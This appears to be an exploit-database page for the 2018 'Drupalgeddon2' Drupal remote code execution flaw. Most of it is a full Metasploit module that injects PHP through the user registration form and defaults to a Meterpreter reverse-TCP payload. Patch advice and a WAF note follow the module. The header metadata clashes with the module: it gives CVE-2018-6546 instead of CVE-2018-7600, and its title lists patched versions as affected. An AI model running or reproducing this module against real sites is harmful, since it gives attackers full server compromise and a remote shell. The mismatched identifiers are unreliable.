Drupal 7.58 – 8.5.1 – ‘Drupalgeddon2’ Remote Code Execution (Metasploit)

Authors:José Ignacio Rojo    Risk:High

CVE:CVE-2018-6546           0day:Arbitrary File Execution

Exploit-id:Exploit-6546      Date:2018-04-18

Overview

A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.
The security team has written an FAQ about this issue.

 Exploit

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking
   
    include Msf::Exploit::Remote::HttpClient
   
    def initialize(info={})
      super(update_info(info,
        'Name'           => 'Drupalgeddon2',
        'Description'    => %q{
          CVE-2018-7600 / SA-CORE-2018-002
          Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1
          allows remote attackers to execute arbitrary code because of an issue affecting
          multiple subsystems with default or common module configurations.
 
          The module can load msf PHP arch payloads, using the php/base64 encoder.
 
          The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'
        },
        'License'        => MSF_LICENSE,
        'Author'         =>
          [
            'Vitalii Rudnykh',      # initial PoC
            'Hans Topo',            # further research and ruby port
            'José Ignacio Rojo'     # further research and msf module
          ],
        'References'     =>
          [
            ['SA-CORE', '2018-002'],
            ['CVE', '2018-7600'],
          ],
        'DefaultOptions'  =>
        {
          'encoder' => 'php/base64',
          'payload' => 'php/meterpreter/reverse_tcp',
        },
        'Privileged'     => false,
        'Platform'       => ['php'],
        'Arch'           => [ARCH_PHP],
        'Targets'        =>
          [
            ['User register form with exec', {}],
          ],
        'DisclosureDate' => 'Apr 15 2018',
        'DefaultTarget'  => 0
      ))
   
      register_options(
        [
          OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/']),
        ])
   
      register_advanced_options(
        [
 
        ])
    end
   
    def uri_path
      normalize_uri(target_uri.path)
    end
 
    def exploit_user_register
      data = Rex::MIME::Message.new
      data.add_part("php -r '#{payload.encoded}'", nil, nil, 'form-data; name="mail[#markup]"')
      data.add_part('markup', nil, nil, 'form-data; name="mail[#type]"')
      data.add_part('user_register_form', nil, nil, 'form-data; name="form_id"')
      data.add_part('1', nil, nil, 'form-data; name="_drupal_ajax"')
      data.add_part('exec', nil, nil, 'form-data; name="mail[#post_render][]"')
      post_data = data.to_s
 
      # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
      send_request_cgi({
        'method'   => 'POST',
        'uri'      => "#{uri_path}user/register",
        'ctype'    => "multipart/form-data; boundary=#{data.bound}",
        'data'     => post_data,
        'vars_get' => {
          'element_parents' => 'account/mail/#value',
          'ajax_form'       => '1',
          '_wrapper_format' => 'drupal_ajax',
        }
      })
    end
   
    ##
    # Main
    ##
   
    def exploit
      case datastore['TARGET']
      when 0
        exploit_user_register
      else
        fail_with(Failure::BadConfig, "Invalid target selected.")
      end
    end
  end

Solution

Upgrade to the most recent version of Drupal 7 or 8 core.

  • If you are running 7.x, upgrade to Drupal 7.58. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update.)
  • If you are running 8.5.x, upgrade to Drupal 8.5.1. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update.)

Drupal 8.3.x and 8.4.x are no longer supported and we don’t normally provide security releases for unsupported minor releases. However, given the potential severity of this issue, we are providing 8.3.x and 8.4.x releases that includes the fix for sites which have not yet had a chance to update to 8.5.0.
Your site’s update report page will recommend the 8.5.x release even if you are on 8.3.x or 8.4.x. Please take the time to update to a supported version after installing this security update.

This issue also affects Drupal 8.2.x and earlier, which are no longer supported. If you are running any of these versions of Drupal 8, update to a more recent release and then follow the instructions above.
This issue also affects Drupal 6. Drupal 6 is End of Life. For more information on Drupal 6 support please contact a D6LTS vendor.

Cloudflare is adding Drupal WAF Rule to Mitigate Critical Drupal Exploit

Drupal has recently announced an update to fix a critical remote code execution exploit (SA-CORE-2018-002/CVE-2018-7600). In response we have just pushed out a rule to block requests matching these exploit conditions for our Web Application Firewall (WAF). You can find this rule in the Cloudflare ruleset in your dashboard under the Drupal category with the rule ID of D0003.
https://blog.cloudflare.com/drupal-waf-rule-mitigate-critical-exploit/

Fixed By:

Timeline

2018-03-21 Drupal official announcement will fix high-risk vulnerabilities next week
2018-03-28 Drupal Officially Releases Patches and Security Announcements
2018-03-30 0DAY DB Release Vulnerability Warning Notice

Reference

Drupal core CVE-2018-7600 Remote Code Execution

Drupal 7.58 -8.5.1 – ‘Drupalgeddon2’ Remote Code Execution Exploit

Drupal 7.58 -8.5.1 – ‘Drupalgeddon2’ Remote Code Execution Exploit

Drupal 7.58 -8.5.1 – ‘Drupalgeddon2’ Remote Code Execution

Leave a Reply